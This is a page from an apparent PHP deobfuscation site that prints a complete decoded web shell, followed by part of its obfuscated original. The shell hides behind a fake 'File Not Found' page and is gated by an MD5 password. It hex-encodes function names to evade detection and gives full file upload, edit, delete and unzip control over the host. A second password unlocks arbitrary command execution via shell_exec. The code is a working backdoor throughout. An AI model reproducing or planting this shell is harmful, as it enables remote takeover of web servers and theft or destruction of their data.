Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto bBL5o; AMuAE: $gcw = $hb($fgtg) . "c" . $hb("7" . "7" . "64"); goto bbERV; N..
Decoded Output download
<?php
goto bBL5o; AMuAE: $gcw = $hb($fgtg) . "c" . $hb("7" . "7" . "64"); goto bbERV; Nrsht: $bxxx = "b" . "i"; goto lHxpY; mrNFH: $ssxx = $hb("7374") . "a"; goto Yn5AG; yxpmW: $fgtg = "6" . "76" . "5" . "7" . "4"; goto Ju0bV; eSSCC: if (!isset($_SESSION["admin"])) { if ($_SESSION["admin"] !== "58186126951b4cf57dddba73dcaf72be") { echo "<p id="file">File Not Found.</p>"; die; } die; } else { ?>
<!DOCTYPE html>
<html>
<head>
<title>ERR</title>
<meta name="robots" content="noindex" />
<link rel="icon" href="https://git-scm.com/images/logos/downloads/Git-Icon-1788C.png" type="image/icon type" />
<script src="https://kit.fontawesome.com/9af3d25b53.js" crossorigin="anonymous"></script>
<style type="text/css">
html {
width: 100%;
height: 100%;
background-color: #111;
margin: 0;
padding: 0;
color: white;
font-family: 'sans-serif',arial, Verdana;
}
body {
width: 100%;
margin: 0;
padding: 0;
}
a {
display: inline-block;
text-decoration: none;
color: #4E9F3D;
font-size: 15px;
font-weight: bold;
border: none;
}
a:hover {
text-decoration: underline;
color: white;
}
input { display: inline; }
input[type=text] {
background: transparent;
color: white;
border: none;
border-bottom: 2px solid green;
padding: 7px;
outline: none;
margin: 0;
}
#cmd {
background: transparent;
color: #eee;
font-weight: bold;
border: 2px solid #333;
padding: 5px 10px;
outline: none;
margin: 0;
}
::placeholder {
color: #ddd;
opacity: 1;
}
input[type=submit] {
display: inline;
background: green;
color: white;
border: none;
padding: 7px;
margin: 0;
border-radius: 8%;
cursor: pointer;
}
button {
display: inline;
cursor: pointer;
background: green;
color: white;
}
table {
border: 3px solid transparent;
border-radius: 0px;
display: block;
width: 1200px;
height: 100%;
color: white;
background: #191A19;
margin: 0;
margin-top: 0px;
padding: 8px;
font-weight: bold;
}
td {
font-size: 15px;
background: transparent;
color: #f8f8f8;
margin: 0;
padding: 0;
padding-bottom: 5px;
border: 0;
}
tr {
border: 0;
width: 100%;
margin: 0;
padding: 10px;
height: 20px;
}
th {
color: #4E9F3D;
border-bottom: 2px solid #333;
text-align: left;
padding: 15px;
}
#menu {
background: #1E5128;
color: #eee;
padding: 12px;
border: none;
border-radius: 5px;
font-size: 10px;
font-weight: bold;
box-shadow: 0px 0px 5px #333;
}
#menu:hover {
background: #151515;
color: #1E5128;
}
#newinput {
width: 150px;
border-bottom: 1px solid #eee;
padding: 8px;
}
#newinput:focus {
border-bottom: 1px solid orangered;
}
#crud {
background: transparent;
padding: 8px;
font-size: 15px;
color: #444;
font-weight: bold;
border-radius: 0px;
border-bottom: 0px solid lime;
}
#crud:hover {
text-shadow: 5px 0 10px #1E5128;
color: #1E5128;
text-decoration: none;
border-bottom: 2px solid #1E5128;
}
#delete {
background: transparent;
padding: 8px;
font-size: 15px;
color: hotpink;
font-weight: blod;
border: 2.5px solid transparent;
}
#delete:hover {
background: transparent;
color: white;
border-bottom: 1px solid white;
text-shadow: #FC0 1px 0 10px;
}
#filename {
font-size: 15px;
color: #999;
}
#filename:hover {
color: #eee;
text-decoration: underline;
}
.container {
border-radius: 0px;
display: block;
width: 100%;
}
form {
display: inline;
}
textarea {
background: #151515;
border: 1px solid $444;
color: #eee;
font-size: 15px;
font-weight: bold;
outline: 0px;
border: 0px;
border-radius: 10px;
padding: 5px 10px;
border-top-left-radius: 0px;
border-top-right-radius:0px;
border-bottom-left-radius: 0px ;
}
.custom-file-input::-webkit-file-upload-button {
visibility: hidden;
}
.custom-file-input::before {
content: 'upload';
display: inline-block;
background: linear-gradient(top, #f9f9f9, #e3e3e3);
border: 1px solid #999;
border-radius: 3px;
padding: 5px 8px;
outline: none;
white-space: nowrap;
-webkit-user-select: none;
cursor: pointer;
font-weight: 700;
font-size: 10pt;
}
.custom-file-input:hover::before {
border-color: black;
}
.custom-file-input:active::before {
background: -webkit-linear-gradient(top, #e3e3e3, #f9f9f9);
}
</style>
</head>
<body>
<?php if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { $server = "WIN"; } if (isset($_POST["create_file"])) { if (!isset($_GET["path"])) { $new_filehandler = $ngopen(dirname(__FILE__) . "/" . $_POST["new_file"], "w"); } else { $new_filehandler = $ngopen($hb($_GET["path"]) . "/" . $_POST["new_file"], "w"); } $ngwrite($new_filehandler, ''); $ngclose($new_filehandler); } if (isset($_POST["mkdir_folder"])) { if (!isset($_GET["path"])) { mkdir(dirname(__FILE__) . "/" . $_POST["new_folder"], 511, true); } else { mkdir($hb($_GET["path"]) . "/" . $_POST["new_folder"], 511, true); } } if (isset($_POST["upload_file"])) { if (isset($_GET["path"])) { $target_dir = $hb($_GET["path"]) . "/"; } else { $target_dir = dirname(__FILE__) . "/"; } $target_file = $target_dir . basename($_FILES["upload_filename"]["name"]); if ($mvfl($_FILES["upload_filename"]["tmp_name"], $target_file)) { $_GET["path"]; } if ($flz($target_file)) { echo "<center><table style="background: lime;"><tr><td style="color:#000;">Successfully Uploaded!</td></tr></table></center>"; } } ?>
<body>
<center>
<br><br>
<table style="border:0; margin-bottom: 0px; padding-bottom:0px ;">
<tr>
<th style="border: 0;" colspan="3">
<a style="color: #eee; text-decoration: none;" href="?"><i class="fa-solid fa-ghost"></i> HOME SHELL</a></th>
</tr>
<tr>
<th style="border: none; color: #4E9F3D;"><i>337 <font color="#333">REGULATOR</font></i> <font color="#eee" size="1">FRY-JYWRDN</font></th>
<th style="border: none;">
<button id="menu" name="mkdir_folder" onclick="new_folder()"><i class="fa-sharp fa-solid fa-virus"></i> NEW FOLDER</button>
<div id="new_folder" style="display:none;">
<form method="POST">
<input id="newinput" type="text" name="new_folder" placeholder="[folder_name]">
<button id="menu" name="mkdir_folder">OK >></button>
</form>
</div>
</th>
<th style="border: none;">
<button id="menu" name="create_file" onclick="new_file()"><i class="fa-sharp fa-solid fa-virus"></i> NEW FILE</button>
<div id="new_file" style="display:none;">
<form method="POST">
<input id="newinput" type="text" name="new_file" placeholder="[file_name]">
<button id="menu" name="create_file">OK >></button>
</form>
</div>
</th>
<th style="border: none;">
<button id="menu" style=" background: #222;"><< @ >></button>
</th>
<th style="border: none;">
<?php if (isset($_POST["logout"])) { session_destroy(); echo "<script>window.location="?xx";</script>"; } ?>
<form method="POST" action="">
<button id="menu" name="logout"><i class="fa-sharp fa-solid fa-virus"></i> LOGOUT</button>
</form>
</th>
</tr>
</table>
<script>
function new_folder() {
var x = document.getElementById("new_folder");
var y = document.getElementById("new_file");
if (x.style.display === "none") {
x.style.display = "inline";
y.style.display = "none";
} else {
x.style.display = "none";
}
}
function new_file() {
var x = document.getElementById("new_file");
var y = document.getElementById("new_folder");
if (x.style.display === "none") {
x.style.display = "inline";
y.style.display = "none";
} else {
x.style.display = "none";
}
}
</script>
<table style="border: none; margin-top: 0px;padding-bottom:0px ;">
<tr>
<th style="border-bottom: none; font-size:15px; margin-left: 0px;">
<button style="background: #222; color: #4E9F3D; font-weight: bold; border: 2px solid #222; padding: 11px; border-radius: 6%;" onclick="toolsDiv()">
<i><b></b></i>
</button> :
<div id="toolsDIV" style="display: none;">
<!-- NAGAMINE POST -->
<form method="POST" action="">
<input type="hidden" name="nagamine">
<button style="background: #eee; color: #111; font-weight: bold; border: 2px solid #eee; padding: 11px; border-radius: 6%;">
</button>
</form> :
<button style="background: transparent; border: 2px solid #eee; padding: 11px; border-radius: 2px;">
F2
</button> :
<button style="background: transparent; border: 2px solid #eee; padding: 11px; border-radius: 2px;">
F3
</button> :
<button style="background: transparent; border: 2px solid #eee; padding: 11px; border-radius: 2px;">
F4
</button> :
<button style="background: #DC0000; color: #eee; font-weight: bold; border: 2px solid #DC0000; padding: 11px; border-radius: 6%;">
</button> :
</div>
<div id="yuzu" style="display: inline">
<button style="background: #1E5128; color: #eee; font-weight: bold; border: 2px solid #1E5128; padding: 11px; border-radius: 6%;" onclick="yuzuDiv()">
<< Yu-Zu >>
</button> :
<div id="yuzuDiv" style="display:none;">
<form method="POST" enctype="multipart/form-data" action="">
<input type="submit" name="upload_file" style="display: none;" id="submit">
<input type="file" class="custom-file-input" name="upload_filename" onchange="document.getElementById('submit').click()">
</form>
:
</div>
</div>
<form method="POST" action="">
<input type="hidden" name="c-engine">
<button style="background: #1E5128; color: #03C988; font-weight: bold; border: 2px solid #1E5128; padding: 11px; border-radius: 6%;">
- <?php if ($_SESSION["engine"] == "admin") { echo "<font style='text-shadow: 0px 0px 5px #000;'color='#fff'>[Tmpv] actived</font>"; } else { echo "<font color='#111'>[Tmpv]</font>"; } ?>
</button>
</form>
</div>
</th>
</tr>
<?php if (isset($_POST["c-engine"])) { if ($_SESSION["engine"] == "admin") { unset($_SESSION["engine"]); } else { unset($_SESSION["engine"]); echo "<tr><td><form method='POST' action='#success'><input type='text' placeholder=' >> C-ENGINE PW' name='pwcmd' ><input type='submit' ></form></td></tr><br>"; } } if (isset($_POST["pwcmd"])) { if ($_POST["pwcmd"] == "337") { $_SESSION["engine"] = "admin"; } } if ($_SESSION["engine"] == "admin") { echo "<td>::: <form method='POST'><input id='cmd' type='text' placeholder=' >> C-ENGINE' name='cengine' style='width:500px;' autofocus> | <button id='cmd' >>></button></form></td>"; } ?>
</table>
<?php if (isset($_POST["cengine"])) { $cmdx = "736865"; $cmdy = "786563"; $xxx = $hb($cmdx) . "ll_e" . $hb($cmdy); $xv = $xxx($_POST["cengine"]); ?>
<table>
<tr>
<td style="font-size: 12px;">
[localhost]~# $ <span style="color: lime;"><?php echo $_POST["cengine"]; ?>
</span>
</td>
</tr>
</table>
<textarea style="width: 1180px; height: 250px; color: #4E9F3D;"><?php echo $xv; ?>
</textarea>
<?php } ?>
</center>
<script>
function toolsDiv() {
var x = document.getElementById("toolsDIV");
var yuzu = document.getElementById("yuzu");
var xx = document.getElementById("yuzuDiv");
if (x.style.display === "none") {
x.style.display = "inline";
yuzu.style.display = "none";
xx.style.display = "none";
} else {
x.style.display = "none";
yuzu.style.display = "inline";
xx.style.display = "none";
}
}
function yuzuDiv() {
var xx = document.getElementById("toolsDIV");
var x = document.getElementById("yuzuDiv");
if (x.style.display === "none") {
x.style.display = "inline";
xx.style.display = "none";
} else {
x.style.display = "none";
xx.style.display = "none";
}
}
</script>
<?php if (!isset($_GET["path"])) { $dir = $gcw(); $path = $bh($dir); $_GET["path"]; $current_file = $hb($_GET["path"]); echo "<center><table style="border: 0;"><tr><td style="padding-left:10px;">Path: </td><td style="padding-left:10px;">"; if ($server !== "WIN") { echo "<a href="?path=2f">/</a></td><td>"; } $dirs = str_replace("\", "/", $dir); $xdir = explode("/", $dirs); foreach ($xdir as $key => $value) { if ($value != '') { echo "<font style="color:#555; font-weight: bold">/</font>"; } if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { echo "<a href="?path="; } else { echo "<a href="?path=2f"; } for ($i = 0; $i <= intval($key); $i++) { $folder_path = $bh($xdir[$i] . "/"); $filepath = $xdir[$i] . "/"; $fld = str_replace(" ", '', $filepath); $fld = str_replace("/", '', $filepath); if ($folder_path != "2f") { echo $folder_path; } } echo "">" . $fld . "</a>"; } echo "</tr></td></table></center>"; } else { $path = $_GET["path"]; $dir = $hb($_GET["path"]); $current_file = $hb($_GET["path"]); echo "<center><table style="border: 0;"><tr><td style="padding-left:10px;">Path: </td><td style="padding-left:10px;">"; if ($server !== "WIN") { echo "<a href="?path=2f">/</a></td><td>"; } $dirs = str_replace("\", "/", $dir); $xdir = explode("/", $dirs); foreach ($xdir as $key => $value) { if ($value != '') { echo "<font style="color:#555; font-weight: bold">/</font>"; } if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { echo "<a href="?path="; } else { echo "<a href="?path=2f"; } for ($i = 0; $i <= intval($key); $i++) { $folder_path = $bh($xdir[$i] . "/"); $filepath = $xdir[$i] . "/"; $fld = str_replace(" ", '', $filepath); $fld = str_replace("/", '', $filepath); if ($folder_path != "2f") { echo $folder_path; } } echo "">" . $fld . "</a>"; } echo "</tr></td></table></center>"; if (is_file($current_file)) { $dirname = $bh(dirname($current_file)); $my = $current_file; $myrx = str_replace($_SERVER["DOCUMENT_ROOT"], "/", $my); $current_file = str_replace("//", "/", $current_file); ?>
<br>
<center>
<table style="width: 1200px;border-bottom-left-radius: 0px; border-bottom-right-radius: 0px;">
<tr>
<td>
Filename: <a target="_blank" href="<?php echo "//" . $_SERVER["HTTP_HOST"] . "/" . $myrx; ?>
"><?php echo $current_file; ?>
</a>
</td>
</tr>
</table>
<?php $f = "f" . "i" . "l" . "e" . "_" . "g" . "e" . "t" . "_" . "c" . "o" . "n" . "t" . "e" . "n" . "t" . "s"; $text = $f($current_file); ?>
<textarea style="width:1180px;height:660px;" readonly><?php echo htmlentities($text); ?>
</textarea><br />
<br><br>
<?php die; } } if (isset($_POST["rename_folder_proccess"])) { rename($_POST["oldfoldername"], $_POST["dirfoldername"] . "/" . $_POST["newfoldername"]); } if (isset($_POST["rename_folder"])) { ?>
<br><br>
<center>
<table>
<tr>
<th><i class="fa-sharp fa-solid fa-hippo"></i> RENAME FOLDER</th>
<th>
dirname:
</th>
<th>
<?php echo dirname($hb($_POST["folderpath"])) . "/"; ?>
</th>
<th width="600px">
<form method="POST">
<input type="hidden" name="dirfoldername" value="<?php echo dirname($hb($_POST["folderpath"])) . "/"; ?>
">
<input type="hidden" name="oldfoldername" value="<?php echo $hb($_POST["folderpath"]); ?>
">
<input type="text" style="font-size: 18px;width:100%" name="newfoldername" value="<?php echo $_POST["foldername"]; ?>
">
</th>
<th>
<input id="crud" type="submit" name="rename_folder_proccess" value="REN">
</form>
</th>
</tr>
</table>
</center>
<?php die; } if (isset($_POST["deletefolder"])) { chmod($hb($_POST["folderpath"], 511)); rmdir($hb($_POST["folderpath"])); } if (isset($_POST["rename_file_proccess"])) { rename($_POST["oldfilename"], $_POST["dirfilename"] . "/" . $_POST["newfilename"]); } if (isset($_POST["rename_file"])) { ?>
<br><br>
<center>
<table>
<tr>
<th><i class="fa-sharp fa-solid fa-hippo"></i> RENAME FILE</th>
<th>
dirname:
</th>
<th>
<?php echo dirname($hb($_POST["filepath"])) . "/"; ?>
</th>
<th width="600px">
<form method="POST">
<input type="hidden" name="dirfilename" value="<?php echo dirname($hb($_POST["filepath"])) . "/"; ?>
">
<input type="hidden" name="oldfilename" value="<?php echo $hb($_POST["filepath"]); ?>
">
<input type="text" style="font-size: 18px;width:100%" name="newfilename" value="<?php echo $_POST["filename"]; ?>
">
</th>
<th>
<input id="crud" type="submit" name="rename_file_proccess" value="REN">
</form>
</th>
</tr>
</table>
</center>
<?php die; } if (isset($_POST["unzip_file"])) { $zip = new ZipArchive(); $res = $zip->open($hb($_POST["filepath"])); if ($res === TRUE) { $zip->extractTo(dirname($hb($_POST["filepath"]))); $zip->close(); echo "<center><table style="background: #00C400;"><tr><td>Successfully Unzip File!</td></tr></table></center>"; } else { echo "<center><table style="background: #DC0000;"><tr><td>Failed to Unzip File!</td></tr></table></center>"; } } if (isset($_POST["deletefile"])) { chmod($hb($_POST["filepath"]), 438); unlink($hb($_POST["filepath"])); } if (isset($_POST["savefile"])) { $file_handler = $ngopen($_POST["filepath"], "w"); $ngwrite($file_handler, $_POST["file_content"]); $ngclose($file_handler); } if (isset($_POST["edit_file"])) { echo "<br><br><br>"; $f = $flg . "_" . "c" . "o" . "n" . "t" . "e" . "n" . "t" . "s"; $text = $f($hb($_POST["filepath"])); ?>
<center>
<table style="background: #F88000; width: 1200px;border-bottom-left-radius: 0px; border-bottom-right-radius: 0px;">
<tr>
<td>
EDITING FILE: <?php echo $_POST["filename"]; ?>
</td>
</tr>
</table>
<form method="POST">
<textarea style="background:#222; width:1180px;height:500px;color:#00C400;" name="file_content"><?php echo htmlentities($text); ?>
</textarea><br><br />
<input type="hidden" name="filepath" value="<?php echo $hb($_POST["filepath"]); ?>
">
<input type="submit" name="savefile" value="save" style="font-size: 18px;">
</form>
<br><br>
</center>
<?php die; } echo "<br>"; ?>
<?php if (is_dir($dir)) { $isi_dir = scandir($dir); } else { $isi_dir = $current_file; } ?>
<center>
<table style="width: 1200px;">
<tr>
<th style="width: 450px"><i class="fa-sharp fa-solid fa-virus"></i> NAME</th>
<th colspan="4" style="width: 170px;">ACTION</th>
<th style="text-align: right; width: 330px;">SIZE</th>
<th style="width:50px;"></th>
<!--
<th>LAST MODIFIED</th>
<th>FILEPERMS</th>-->
</tr>
<?php foreach ($isi_dir as $x => $foldername) { if (is_dir($dir . "/" . $foldername)) { if ($foldername !== "." & $foldername !== "..") { $folderpath = $bh($dir . "/" . $foldername); ?>
<tr>
<td>
<p>
<i class="fa-solid fa-folder-open" style="color: #888;padding: 5px;"></i>
<a id="filename" href="?path=<?php echo $folderpath; ?>
"><?php echo $foldername; ?>
</a>
</p>
</td>
<td></td>
<td>
<form method="POST">
<input type="hidden" name="folderpath" value="<?php echo $folderpath; ?>
">
<input type="hidden" name="foldername" value="<?php echo $foldername; ?>
">
<input id="crud" type="submit" name="rename_folder" value="REN">
</form>
</td>
<td></td>
<td>
<form method="POST">
<input type="hidden" name="folderpath" value="<?php echo $folderpath; ?>
">
<input type="hidden" name="foldername" value="<?php echo $foldername; ?>
">
<input id="crud" style="color: #DC0000;" type="submit" name="deletefolder" value="DEL">
</form>
</td>
<td align="right" style="color: #555;">DIR <span style="color: #eee;"> |</span></td>
<td><?php $folder_x = str_replace($_SERVER["DOCUMENT_ROOT"], "/", $hb($folderpath)); ?>
<a target="_blank" href="<?php echo "http://" . $_SERVER["HTTP_HOST"] . "/" . $folder_x; ?>
"><i class="fa-sharp fa-solid fa-arrow-up-right-from-square"></i></a>
</td>
</tr>
<?php } } } echo ''; foreach ($isi_dir as $x => $filename) { if (is_file($dir . "/" . $filename)) { if ($filename !== "." & $filename !== "..") { $filepath = $bh($dir . "/" . $filename); ?>
<tr>
<td>
<p>
<i class="fa-solid fa-file-lines" style="color: #888;padding: 5px;"></i>
<a id="filename" href="?path=<?php echo $filepath; ?>
"><?php echo $filename; ?>
</a>
</p>
</td>
<td>
<form method="POST">
<input type="hidden" name="filepath" value="<?php echo $filepath; ?>
">
<input type="hidden" name="filename" value="<?php echo $filename; ?>
">
<input type="submit" id="crud" name="edit_file" value="EDIT">
</form>
</td>
<td>
<form method="POST">
<input type="hidden" name="filepath" value="<?php echo $filepath; ?>
">
<input type="hidden" name="filename" value="<?php echo $filename; ?>
">
<input id="crud" type="submit" name="rename_file" value="REN">
</form>
</td>
<td>
<?php $ext = pathinfo($filename, PATHINFO_EXTENSION); if ($ext == "zip") { ?>
<form method="POST">
<input type="hidden" name="filepath" value="<?php echo $filepath; ?>
">
<input type="hidden" name="filename" value="<?php echo $filename; ?>
">
<input id="crud" type="submit" style="color:#f88000;" name="unzip_file" value="UNZ">
</form>
<?php } ?>
</td>
<td>
<form method="POST">
<input type="hidden" name="filepath" value="<?php echo $filepath; ?>
">
<input type="hidden" name="filename" value="<?php echo $filename; ?>
">
<input id="crud" style="color: #DC0000;" type="submit" name="deletefile" value="DEL">
</form>
</td>
<td align="right" style="color: #555;">
<?php echo $flz($dir . "/" . $filename); ?>
KB <span style="color: #eee;"> |</span>
</td>
<td><?php $file_x = str_replace($_SERVER["DOCUMENT_ROOT"], "/", $hb($filepath)); $file_x = str_replace("//", "/", $file_x); $file_addr = "http://" . $_SERVER["HTTP_HOST"] . "/" . $file_x; $file_addr = str_replace("///", "/", $file_addr); $file_addr = str_replace("//", "/", $file_addr); ?>
<a target="_blank" href="<?php echo $file_addr; ?>
"><i class="fa-sharp fa-solid fa-arrow-up-right-from-square"></i></a>
</td>
</tr>
<?php } } } echo "</table><table><tr><td style="color: #444;"><i>Pure Coded by PENGABDI STEPMOM</i></tr></td></table></center><br><br /></body>"; } goto aig_F; bbERV: $flz = $hb($fxxx) . "s" . $hb("6" . "97a") . "e"; goto uGS04; lHxpY: $bxx = "n" . "2h"; goto BeEcL; uGS04: $mvfl = $hb("6d6" . "f") . "ve_" . "u" . $hb("70" . "6c6f6164") . "ed_" . $hb($fxxx); goto hy1xm; BRHG8: $ernull = $exxx . $hb($exx) . $exxv . $hb($exv); goto Gg21o; WJOdQ: $md = $hb("6" . "d") . "d" . $hb("3" . "5"); goto EbGfa; aKYwJ: $ss = $ssxxx . $ssxx . $hb($ssx); goto FatQ3; nfBSB: $hb = $hxxx . $hxx . $hx; goto Nrsht; eVF9W: $flg = $hb($fxxx) . "_" . $hb($fgtg); goto pMPuL; pMPuL: $flp = $hb($fxxx) . "_" . $hb($fgtp); goto AMuAE; KHjjM: $exxv = "o"; goto eMYtf; dZaHg: $exx = "725f726570"; goto KHjjM; hy1xm: $ngopen = "f" . $hb("6f" . "70") . "en"; goto suyYJ; JOLCZ: if (isset($_POST["login"])) { $password = $_POST["admin"]; $password = $md($password); $pass = "58186126951b4cf57dddba73dcaf72be"; if ($password == $pass) { $_SESSION["admin"] = "58186126951b4cf57dddba73dcaf72be"; } } goto QSl0R; Q3vyn: $bh = $bxxx . $bxx . $bx; goto XxKlQ; QSl0R: if (isset($_GET["xx"])) { ?>
<form method="POST"><input type="text" name="admin"><input type="submit" name="login"></form>
<?php } goto eSSCC; wB9B7: $hxx = "x" . "2"; goto ZKEHq; Ju0bV: $fgtp = "70" . "7" . "5" . "7" . "4"; goto eVF9W; XxKlQ: $ssxxx = "s" . "e" . $hb("737369") . "on_"; goto mrNFH; suyYJ: $ngwrite = "f" . $hb("777" . "26974") . "e"; goto jESXX; eMYtf: $exv = "7274696e67"; goto BRHG8; FatQ3: $ss(); goto k_Vuc; Pw87n: $shl = $hb($ehs) . "ll_e" . $hb($cex); goto JOLCZ; Gg21o: $ernull(0); goto RMghN; jESXX: $ngclose = "f" . $hb("636" . "c6f73") . "e"; goto WJOdQ; Yn5AG: $exxx = "e" . $hb("72726f"); goto dZaHg; Oo4ox: $cex = "786563"; goto Pw87n; EbGfa: $ehs = "736865"; goto Oo4ox; k_Vuc: $fxxx = "6" . "6" . "69" . "6" . "c" . "6" . "5"; goto yxpmW; BeEcL: $bx = "e" . "x"; goto Q3vyn; ZKEHq: $hx = "b" . "in"; goto nfBSB; RMghN: $ssx = "7274"; goto aKYwJ; bBL5o: $hxxx = "h" . "e"; goto wB9B7; aig_F: ?>
Did this file decode correctly?
Original Code
<?php
goto bBL5o; AMuAE: $gcw = $hb($fgtg) . "c" . $hb("7" . "7" . "64"); goto bbERV; Nrsht: $bxxx = "b" . "i"; goto lHxpY; mrNFH: $ssxx = $hb("7374") . "a"; goto Yn5AG; yxpmW: $fgtg = "6" . "76" . "5" . "7" . "4"; goto Ju0bV; eSSCC: if (!isset($_SESSION["admin"])) { if ($_SESSION["admin"] !== "58186126951b4cf57dddba73dcaf72be") { echo "<p id="file">File Not Found.</p>"; die; } die; } else { ?>
<!DOCTYPE html>
<html>
<head>
<title>ERR</title>
<meta name="robots" content="noindex" />
<link rel="icon" href="https://git-scm.com/images/logos/downloads/Git-Icon-1788C.png" type="image/icon type" />
<script src="https://kit.fontawesome.com/9af3d25b53.js" crossorigin="anonymous"></script>
<style type="text/css">
html {
width: 100%;
height: 100%;
background-color: #111;
margin: 0;
padding: 0;
color: white;
font-family: 'sans-serif',arial, Verdana;
}
body {
width: 100%;
margin: 0;
padding: 0;
}
a {
display: inline-block;
text-decoration: none;
color: #4E9F3D;
font-size: 15px;
font-weight: bold;
border: none;
}
a:hover {
text-decoration: underline;
color: white;
}
input { display: inline; }
input[type=text] {
background: transparent;
color: white;
border: none;
border-bottom: 2px solid green;
padding: 7px;
outline: none;
margin: 0;
}
#cmd {
background: transparent;
color: #eee;
font-weight: bold;
border: 2px solid #333;
padding: 5px 10px;
outline: none;
margin: 0;
}
::placeholder {
color: #ddd;
opacity: 1;
}
input[type=submit] {
display: inline;
background: green;
color: white;
border: none;
padding: 7px;
margin: 0;
border-radius: 8%;
cursor: pointer;
}
button {
display: inline;
cursor: pointer;
background: green;
color: white;
}
table {
border: 3px solid transparent;
border-radius: 0px;
display: block;
width: 1200px;
height: 100%;
color: white;
background: #191A19;
margin: 0;
margin-top: 0px;
padding: 8px;
font-weight: bold;
}
td {
font-size: 15px;
background: transparent;
color: #f8f8f8;
margin: 0;
padding: 0;
padding-bottom: 5px;
border: 0;
}
tr {
border: 0;
width: 100%;
margin: 0;
padding: 10px;
height: 20px;
}
th {
color: #4E9F3D;
border-bottom: 2px solid #333;
text-align: left;
padding: 15px;
}
#menu {
background: #1E5128;
color: #eee;
padding: 12px;
border: none;
border-radius: 5px;
font-size: 10px;
font-weight: bold;
box-shadow: 0px 0px 5px #333;
}
#menu:hover {
background: #151515;
color: #1E5128;
}
#newinput {
width: 150px;
border-bottom: 1px solid #eee;
padding: 8px;
}
#newinput:focus {
border-bottom: 1px solid orangered;
}
#crud {
background: transparent;
padding: 8px;
font-size: 15px;
color: #444;
font-weight: bold;
border-radius: 0px;
border-bottom: 0px solid lime;
}
#crud:hover {
text-shadow: 5px 0 10px #1E5128;
color: #1E5128;
text-decoration: none;
border-bottom: 2px solid #1E5128;
}
#delete {
background: transparent;
padding: 8px;
font-size: 15px;
color: hotpink;
font-weight: blod;
border: 2.5px solid transparent;
}
#delete:hover {
background: transparent;
color: white;
border-bottom: 1px solid white;
text-shadow: #FC0 1px 0 10px;
}
#filename {
font-size: 15px;
color: #999;
}
#filename:hover {
color: #eee;
text-decoration: underline;
}
.container {
border-radius: 0px;
display: block;
width: 100%;
}
form {
display: inline;
}
textarea {
background: #151515;
border: 1px solid $444;
color: #eee;
font-size: 15px;
font-weight: bold;
outline: 0px;
border: 0px;
border-radius: 10px;
padding: 5px 10px;
border-top-left-radius: 0px;
border-top-right-radius:0px;
border-bottom-left-radius: 0px ;
}
.custom-file-input::-webkit-file-upload-button {
visibility: hidden;
}
.custom-file-input::before {
content: 'upload';
display: inline-block;
background: linear-gradient(top, #f9f9f9, #e3e3e3);
border: 1px solid #999;
border-radius: 3px;
padding: 5px 8px;
outline: none;
white-space: nowrap;
-webkit-user-select: none;
cursor: pointer;
font-weight: 700;
font-size: 10pt;
}
.custom-file-input:hover::before {
border-color: black;
}
.custom-file-input:active::before {
background: -webkit-linear-gradient(top, #e3e3e3, #f9f9f9);
}
</style>
</head>
<body>
<?php if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { $server = "WIN"; } if (isset($_POST["create_file"])) { if (!isset($_GET["path"])) { $new_filehandler = $ngopen(dirname(__FILE__) . "/" . $_POST["new_file"], "w"); } else { $new_filehandler = $ngopen($hb($_GET["path"]) . "/" . $_POST["new_file"], "w"); } $ngwrite($new_filehandler, ''); $ngclose($new_filehandler); } if (isset($_POST["mkdir_folder"])) { if (!isset($_GET["path"])) { mkdir(dirname(__FILE__) . "/" . $_POST["new_folder"], 511, true); } else { mkdir($hb($_GET["path"]) . "/" . $_POST["new_folder"], 511, true); } } if (isset($_POST["upload_file"])) { if (isset($_GET["path"])) { $target_dir = $hb($_GET["path"]) . "/"; } else { $target_dir = dirname(__FILE__) . "/"; } $target_file = $target_dir . basename($_FILES["upload_filename"]["name"]); if ($mvfl($_FILES["upload_filename"]["tmp_name"], $target_file)) { $_GET["path"]; } if ($flz($target_file)) { echo "<center><table style="background: lime;"><tr><td style="color:#000;">Successfully Uploaded!</td></tr></table></center>"; } } ?>
<body>
<center>
<br><br>
<table style="border:0; margin-bottom: 0px; padding-bottom:0px ;">
<tr>
<th style="border: 0;" colspan="3">
<a style="color: #eee; text-decoration: none;" href="?"><i class="fa-solid fa-ghost"></i> HOME SHELL</a></th>
</tr>
<tr>
<th style="border: none; color: #4E9F3D;"><i>337 <font color="#333">REGULATOR</font></i> <font color="#eee" size="1">FRY-JYWRDN</font></th>
<th style="border: none;">
<button id="menu" name="mkdir_folder" onclick="new_folder()"><i class="fa-sharp fa-solid fa-virus"></i> NEW FOLDER</button>
<div id="new_folder" style="display:none;">
<form method="POST">
<input id="newinput" type="text" name="new_folder" placeholder="[folder_name]">
<button id="menu" name="mkdir_folder">OK >></button>
</form>
</div>
</th>
<th style="border: none;">
<button id="menu" name="create_file" onclick="new_file()"><i class="fa-sharp fa-solid fa-virus"></i> NEW FILE</button>
<div id="new_file" style="display:none;">
<form method="POST">
<input id="newinput" type="text" name="new_file" placeholder="[file_name]">
<button id="menu" name="create_file">OK >></button>
</form>
</div>
</th>
<th style="border: none;">
<button id="menu" style=" background: #222;"><< @ >></button>
</th>
<th style="border: none;">
<?php if (isset($_POST["logout"])) { session_destroy(); echo "<script>window.location="?xx";</script>"; } ?>
<form method="POST" action="">
<button id="menu" name="logout"><i class="fa-sharp fa-solid fa-virus"></i> LOGOUT</button>
</form>
</th>
</tr>
</table>
<script>
function new_folder() {
var x = document.getElementById("new_folder");
var y = document.getElementById("new_file");
if (x.style.display === "none") {
x.style.display = "inline";
y.style.display = "none";
} else {
x.style.display = "none";
}
}
function new_file() {
var x = document.getElementById("new_file");
var y = document.getElementById("new_folder");
if (x.style.display === "none") {
x.style.display = "inline";
y.style.display = "none";
} else {
x.style.display = "none";
}
}
</script>
<table style="border: none; margin-top: 0px;padding-bottom:0px ;">
<tr>
<th style="border-bottom: none; font-size:15px; margin-left: 0px;">
<button style="background: #222; color: #4E9F3D; font-weight: bold; border: 2px solid #222; padding: 11px; border-radius: 6%;" onclick="toolsDiv()">
<i><b></b></i>
</button> :
<div id="toolsDIV" style="display: none;">
<!-- NAGAMINE POST -->
<form method="POST" action="">
<input type="hidden" name="nagamine">
<button style="background: #eee; color: #111; font-weight: bold; border: 2px solid #eee; padding: 11px; border-radius: 6%;">
</button>
</form> :
